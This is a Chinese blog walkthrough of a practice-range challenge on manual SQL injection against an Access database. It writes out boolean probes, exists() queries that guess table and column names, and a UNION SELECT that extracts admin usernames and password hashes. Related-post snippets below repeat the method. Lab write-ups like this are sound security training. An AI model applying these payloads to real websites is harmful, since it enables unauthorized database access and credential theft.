墨者学院-SQL手工注入漏洞测试(Access数据库)

最新推荐文章于 2023-08-26 07:59:42 发布
最新推荐文章于 2023-08-26 07:59:42 发布
阅读量683 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100548409
版权

SQL手工注入漏洞测试(Access数据库)

难易程度:★
题目类型:SQL注入
使用工具:FireFox浏览器

1.打开靶场,寻找注入点。
确定了公告页面可以注入。

2.输入id=1 and 1=1,返回正常页面。
在这里插入图片描述
输入id=1 and 1=2,则返回空白页。
在这里插入图片描述
3.猜测数据库的表名,输入id=1 and exists(select * from admin),返回正常页面,证明猜对了。
在这里插入图片描述
4.猜测存在的列名,输入id=1 and exists(select id from admin),返回正常页面,证明存在该列名。
尝试了id=1 and exists(select username from admin)也返回正常页面。
尝试id=1 and exists(select password from admin)返回空白页,证明密码的列名猜错了。
在这里插入图片描述
把password改为passwd,返回正常页面!
在这里插入图片描述
5.最后输入id=1 union select 1,username,passwd,4 from admin,显示用户名和密码。
在这里插入图片描述
6.把密码通过md5解密
在这里插入图片描述
7.登录成功,获取key。
在这里插入图片描述

JimWu95
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入Access注入手工
12-14
什么是SQL注入SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 —-百度百科 寻找注入点 首先呢,在网站中寻找传递参数的页面,也就是寻找注入点。 判断注入 找到页面(注入点)之后呢,我们需要判断当前页面是否存在注入 传统的方法是: 语句 状态 链接后面加 ’ 报错 and 1=1 正常 and 1=2 报错 or 1=2 正常 or 1=1
SQL手工注入漏洞测试(Access数据库)-墨者
最新发布
weoptions的博客
12-06 728
———靶场专栏———分享我的打靶过程
墨者学院sql手工注入access;在线靶场
xiaochenhang的博客
08-20 716
恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d。6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。5、access数据库没有库名,都是表名;4、输入' 成功闭合报错,有注入漏洞;1、注册账号,启动环境;9、爆一下用户账户和密码;2、 得到端口号和地址;这里枚举失败,翻车;
墨者学院02 SQL手工注入漏洞测试(Access数据库)
weixin_42789937的博客
01-24 289
墨者学院02 SQL手工注入漏洞测试(Access数据库),是一个较为详细的WP~
SQL手工注入漏洞测试(Access数据库)
Fisher
12-13 1189
1.判断数据库 首先拿到手依然是找注入点,此题注入点id=1,已经找到接着进行判断数据库类型,当然我们已经找到这个数据库access,但是我们仍然需要判断一下。具体参照https://blog.csdn.net/happyorange2014/article/details/49754951这个博客写的异常好,介绍了怎么判断access数据库。 试了一下最好用的还是用len()和chr()函数进行判断 chr(65)='A’,发现界面正确,说明可以用chr()函数 接下可以看出来len(‘a’)=1.l
墨者靶场-SQL手工注入漏洞测试(Access数据库)
Sa1nZen的博客
08-26 196
墨者靶场-SQL手工注入漏洞测试(Access数据库)
SQL手工注入漏洞测试Access数据库墨者学院靶场)
ISNS的博客
07-09 1469
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者学院--SQL手工注入漏洞测试(Access数据库)
YYYYYcici的博客
05-18 848
墨者学院SQL手工注入漏洞测试(Access数据库) 靶场连接: 解题思路: 判断是否存在sql注入 利用order by判断字段数量 联合注入猜测表名 联合注入猜测列名 登陆,拿KEY 打开题目,页面如下所示 一、 点击蓝色划线区域,跳转下一正常页面(跳转页面出现id=1) 二、判断存在注入(/ 、-0 、 and 1=1) 三、判断字段数量(order by...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值